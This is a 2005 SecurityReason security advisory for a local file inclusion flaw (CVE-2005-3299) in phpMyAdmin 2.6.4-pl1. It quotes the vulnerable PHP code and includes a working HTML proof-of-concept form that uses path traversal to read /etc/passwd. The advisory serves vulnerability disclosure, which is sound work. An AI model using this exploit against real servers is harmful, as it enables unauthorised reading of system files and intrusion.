|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 69 CVE : CVE-2005-3299 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : Maksymilian Arciemowicz Published : 10.10.2005
Advisory Content : -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [phpMyAdmin Local file inclusion 2.6.4-pl1] Author: Maksymilian Arciemowicz ( cXIb8O3 ).18 Date: 10.10.2005 from SECURITYREASON.COM - --- 0.Description --- phpMyAdmin 2.6.4 is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields. blablabla... phpMyAdmin is very dangerous script. - --- 1. Local file inclusion (Critical) --- File: ./libraries/grab_globals.lib.php This file is included by many files. Example file index.php - -index.php-- <?php /* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */ // vim: expandtab sw=4 ts=4 sts=4: /** * Gets core libraries and defines some variables */ require_once('./libraries/grab_globals.lib.php'); require_once('./libraries/common.lib.php'); ... - -index.php-- ok so. In ./libraries/grab_globals.lib.php we have: - -101-104-grab_globals.lib.php--------- if ( ! empty( $__redirect ) ) { require('./' . $__redirect); exit(); } // end if ( ! empty( $__redirect ) ) - -101-104-grab_globals.lib.php--------- But before we have - -53-67-grab_globals.lib.php----------- // check if a subform is submitted $__redirect = NULL; if ( isset( $_POST['usesubform'] ) ) { // if a subform is present and should be used // the rest of the form is deprecated $subform_id = key( $_POST['usesubform'] ); $subform = $_POST['subform'][$subform_id]; $_POST = $subform; if ( isset( $_POST['redirect'] ) && $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) { $__redirect = $_POST['redirect']; unset( $_POST['redirect'] ); } // end if ( isset( $_POST['redirect'] ) ) } // end if ( isset( $_POST['usesubform'] ) ) // end check if a subform is submitted - -53-67-grab_globals.lib.php----------- If varible $_POST['usesubform'] exists and is array, that we can created new varibles for $_POST (example $_POST['redirect']). $subform = $_POST['subform'][$subform_id]; $_POST = $subform; where array $_POST = array $_POST[subform][1] that $_POST['redirect']=$_POST[subform][1][redirect] and we have local file inclusion. Example response in html: - -Exploit--- <CENTER> <A HREF="http://www.securityreason.com><IMG SRC="http://securityreason.com/gfx/small_logo.png"></A><P> <FORM action="http://localhost/phpMyAdmin-2.6.4-pl1/index.php" method=post enctype="multipart/form-data"> <input TYPE="hidden" name="usesubform[1]" value="1"> <input TYPE="hidden" name="usesubform[2]" value="1"> <input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p> <input TYPE="hidden" name="subform[1][cXIb8O3]" value="1"> <input TYPE="submit" value="Exploit"> </FORM> - -Exploit--- Exploit: http://securityreason.com/achievement_exploitalert/2 - --- 2. Greets --- sp3x - --- 3.Contact --- Author: Maksymilian Arciemowicz < cXIb8O3 > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg WWW: http://securityreason.com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T cvqCRiRlK9XrQGvV3sYxzXQ= =yoDY -----END PGP SIGNATURE-----  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |